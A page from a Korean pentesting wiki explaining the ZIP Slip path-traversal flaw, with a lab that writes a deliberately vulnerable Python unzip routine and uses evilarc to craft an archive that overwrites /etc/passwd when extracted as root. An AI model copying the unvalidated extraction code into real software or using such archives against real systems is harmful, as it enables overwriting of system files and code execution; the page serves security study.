펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Tickets
      • Diamond Tickets
      • DC Shadow
      • RID Hijacking
      • Certificate
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • GenericAll
        • Inherited GenericAll
        • WriteOwner
        • GenericWrite
        • WriteProperty
        • WriteSPN
        • AddMembers
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
        • Restore-ADObject
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Tickets
      • KrbRelayUp
      • GPO
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • Kerberoasting
      • Timeroasting
      • Targeted Kerberoast
      • ASRep-Roasting
      • AS Requested Service Tickets
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • Resource Based Constrained Delegation
      • Shadow Credentials
      • DCSync
      • LSASS
      • Backup Operators
      • SeEnableDelegationPrivilege
      • Domain Cached Credentials
      • Network Access Account Credentials
      • DPAPI Backup Key
    • Windows
      • Unattended File
      • DPAPI
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Pivoting
      • SOCKS
      • Proxifier
      • Remote Port Forwarding
    • NTLM Relay
    • WebDAV Relay
    • WinRM
    • PsExec
    • WMI
    • DCOM
    • RDP
    • Port Forwarding
    • Domain Trust Discovery
  • 사용자 가장
    • Pass the Hash
  • Pass the Ticket
  • Overpass the Hash
  • Token Impersonation
  • Make Token
  • Process Injection
  • Domain Trust
    • Active Directory Trusts
    • Two-way Domain Trust
    • One-way Domain Trust
  • ETC
    • CS
      • Active Directory
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Delegation
      • OAuth 2.0
      • S4U
      • SCCM
      • SID History
      • TRUSTWORTHY
      • Link Server Passwords
      • SSL Pinning
    • Tools
      • Mindmap
      • Cobalt Strike
      • BloodHound
      • LDAP Search
      • Hydra
      • Hashcat
      • Ligolo-ng
    • Home Lab
Powered by GitBook
On this page
  • Practice
  • References

Was this helpful?

Export as PDF
  1. 초기 침투

ZIP Slip

ZIP Slip Attack은 압축 파일을 압축 해제하는 과정에서 압축된 파일의 이름을 적절하게 검증하지 않는다면 Path Traversal 공격이 가능한 취약점입니다. 공격을 통해서 기존에 존재하는 서버의 파일을 덮어쓰거나, 악성 코드를 올려둬서 실행시키게끔 하는 DLL Hijacking 공격 시나리오로 이어질 수 있습니다.

Practice

unzip과 7z 등의 상용 압축 해제 프로그램의 경우 보안 업데이트가 되기 때문에 CVE에 대한 패치로 실습이 어렵기 때문에 압축을 해제하는 파이썬 프로그램을 먼저 제작합니다.

import zipfile
import os

def extract_zip(zip_path, extract_to):
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        for file in zip_ref.namelist():
            file_path = os.path.join(extract_to, file)
            os.makedirs(os.path.dirname(file_path), exist_ok=True)
            with open(file_path, 'wb') as f:
                f.write(zip_ref.read(file))

extract_zip('evil.zip', '.')

이후 evilarc를 통해서 경로 이동 문자를 포함한 압축 파일을 생성한 뒤 압축 해제 프로그램을 통해 압축을 해제합니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# python2 evilarc.py passwd --depth 5 --path '/etc/' --os unix 
Creating evil.zip containing ../../../../..//etc/passwd
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# python3 unzip.py evil.zip                                   
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# cat /etc/passwd
ZIP Slip Vulneabliity Test

References

PreviousSOP / CORSNextActive Directory

Last updated 1 month ago

Was this helpful?

Zip Slip AttackMedium
GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilitiesGitHub
Logo
Logo